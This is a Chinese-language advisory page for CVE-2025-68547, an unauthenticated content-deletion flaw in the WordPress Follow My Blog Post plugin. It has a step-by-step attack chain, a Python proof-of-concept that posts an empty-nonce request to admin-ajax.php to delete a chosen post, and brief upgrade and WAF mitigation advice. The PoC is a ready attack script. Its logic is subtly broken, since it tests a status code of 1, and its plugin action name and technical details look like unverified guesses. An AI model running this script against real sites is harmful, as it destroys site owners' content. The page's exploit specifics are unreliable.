CVE-2025-68547 WordPress Follow My Blog Post插件缺少授权漏洞

漏洞信息

漏洞编号

CVE-2025-68547

漏洞类型

缺少授权（Missing Authorization）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Follow My Blog Post插件（wpweb）

漏洞概述

CVE-2025-68547是WordPress Follow My Blog Post插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于缺少授权（Missing Authorization）类型，存在于插件的访问控制机制中。攻击者可以在无需任何认证的情况下，利用该漏洞执行未授权的操作，具体表现为任意内容删除。由于该插件允许用户订阅和跟踪博客文章更新，攻击者可能通过构造恶意请求来删除任意文章、页面或其他内容，对网站完整性造成严重威胁。漏洞影响范围涵盖插件从早期版本到2.4.0的所有版本，建议用户尽快升级到最新修复版本以消除安全风险。

技术细节

该漏洞源于Follow My Blog Post插件在处理内容删除请求时未正确验证用户权限。插件的AJAX处理函数和直接访问端点缺少足够的访问控制检查，导致任何未认证用户都可以触发删除操作。攻击者通过分析插件的URL结构和参数命名规则，可以构造特定的HTTP请求来调用删除功能。具体来说，插件在处理follow-my-blog-post相关的AJAX操作时，未对action参数进行权限验证，攻击者只需知道目标内容的ID即可执行删除。由于WordPress的REST API端点对某些操作缺乏严格的用户身份验证，攻击者可以在不登录后台的情况下完成整个攻击链。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的WordPress版本和Follow My Blog Post插件，确认为受影响版本（<=2.4.0）

STEP 2

步骤2：端点识别

通过分析插件JavaScript文件或直接访问wp-admin/admin-ajax.php，识别出插件的AJAX处理端点和参数结构

STEP 3

步骤3：构造恶意请求

攻击者构造包含目标文章ID的HTTP POST请求，由于插件未验证权限，nonce字段可以为空或随意填写

STEP 4

步骤4：发送攻击载荷

通过自动化工具（如Python requests或Burp Suite）发送恶意请求到/admin-ajax.php端点

STEP 5

步骤5：内容删除

服务器端插件接收到请求后，直接执行删除操作而无需验证用户身份，导致目标文章或页面被永久删除

STEP 6

步骤6：痕迹清理

攻击完成，攻击者可能继续删除更多内容或利用获取的信息进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68547 PoC - WordPress Follow My Blog Post Plugin Authorization Bypass
# Affected: Follow My Blog Post <= 2.4.0

import requests
import sys

target_url = "http://target-wordpress-site.com"

# Step 1: Identify the vulnerable endpoint
vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Step 2: Construct malicious request to delete arbitrary content
payload = {
    "action": "fmbp_delete_content",  # Plugin's AJAX action
    "post_id": "1",  # Target post ID to delete
    "nonce": ""  # Empty nonce - demonstrating lack of authorization check
}

print(f"[*] Sending malicious request to {vulnerable_endpoint}")
print(f"[*] Target URL: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(vulnerable_endpoint, data=payload, timeout=10)
    
    if response.status_code == 200:
        print(f"[+] Request sent successfully")
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Content: {response.text[:200]}")
        
        # Check if deletion was successful
        if "deleted" in response.text.lower() or response.status_code == 1:
            print("[!] Content deletion successful - Vulnerability confirmed!")
        else:
            print("[*] Response received - verify manually")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

print("\n[*] Note: This PoC demonstrates the authorization bypass vulnerability")
print("[*] Always obtain proper authorization before testing")

影响范围

Follow My Blog Post <= 2.4.0

防御指南

临时缓解措施

立即将Follow My Blog Post插件升级到最新版本（2.4.1及以上），同时检查是否有其他安全更新。在等待升级期间，可以通过Web应用防火墙（WAF）限制对/admin-ajax.php的访问，或者暂时禁用该插件以避免安全风险。建议管理员审查最近的内容删除日志，确认是否已有 exploitation 尝试。